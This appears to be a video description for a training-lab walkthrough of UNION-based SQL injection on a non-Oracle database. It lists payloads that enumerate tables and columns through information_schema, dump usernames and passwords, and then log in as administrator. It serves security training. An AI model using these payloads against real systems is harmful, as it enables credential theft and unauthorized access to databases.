SQL injection attack, listing the database contents on non-Oracle databases
🛠️ Use Burp Suite to intercept and modify the request setting the product category filter.
📊 Determine the number of columns returned by the query and which ones contain text data. Verify that two columns contain text using this payload:
`'+UNION+SELECT+'abc','def'--`
🔍 Retrieve the list of tables in the database with this payload:
`'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--`
🔐 Find the table with user credentials, then retrieve column details using:
`'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--`
👤 Find columns for usernames and passwords. Retrieve them using:
`'+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--`
🔑 Finally, locate the administrator's password and use it to log in!
Смотрите видео SQL injection attack, listing the database contents on non-Oracle databases онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь Aditi Decrypts 22 Сентябрь 2024, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 17 раз и оно понравилось 2 людям.